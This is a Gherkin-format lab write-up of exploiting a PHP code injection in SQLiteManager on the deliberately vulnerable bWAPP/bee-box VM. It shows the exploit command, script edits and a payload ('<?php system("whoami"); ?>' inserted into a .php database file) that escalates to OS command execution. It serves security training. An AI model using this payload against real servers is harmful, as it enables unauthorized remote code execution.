# language: en

Feature: SQLiteManager PHP Code Injection
  From the bWAPP system
  Of the category A9: Using Known Vulnerable Components
  With low security level
  As the registered user disassembly
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/

  Background:
    Given I'm on macOS High Sierra 10.13.6 (17G65)
    And running bee-box v1.6 on Oracle VM VirtualBox Manager 5.2.16
    And using Safari Version 11.1.2 (13605.3.8)
    And working with Python 2.7.10
    Given the following scenario
    """
    URN: /phpi_sqlitemanager.php
    Message: SQLiteManager PHP Code Injection
    Details:
      - Message with a link to the SQLiteManager site
      - Link to a public exploit made by RealGame
    Objective: Use the script to make a PHPi
    """

  Scenario: Perform a PHPi through RCE
    Given the python script (exploit) that do a PHPi create a database
    And insert the phpinfo() function into a row
    When I download this script and pass the URL of the SQLiteManager
    """
    $ python sqlite.py http://192.168.1.18/sqlite/
    SQLiteManager Exploit
    Made By RealGame
    http://www.RealGame.co.il

    Succeed
    """
    Then the exploit is executed and the content of phpinfo() is available on:
    """
    http://192.168.1.18/sqlite/phpinfo.php
    """
    But for an instant, no other visible trace is found since the database
    And his rows are deleted from the SQLiteManager
    When I slightly modify the script again to make a simple 'whoami' command
    And not remove the reference to the database
    """
    73 myDbName  = "whoami"
    74 myDbFile  = "whoami.php"
    88 'INSERT INTO temptab VALUES (\'<?php system("whoami"); ?>\');\n',
    """
    Then I get positive results, so this vulnerability can be escalated to OSi
    """
    ** This file contains an SQLite 2.1 database **
    (table temptab temptab CREATE TABLE temptab ( codetab text ) www-data)
    """
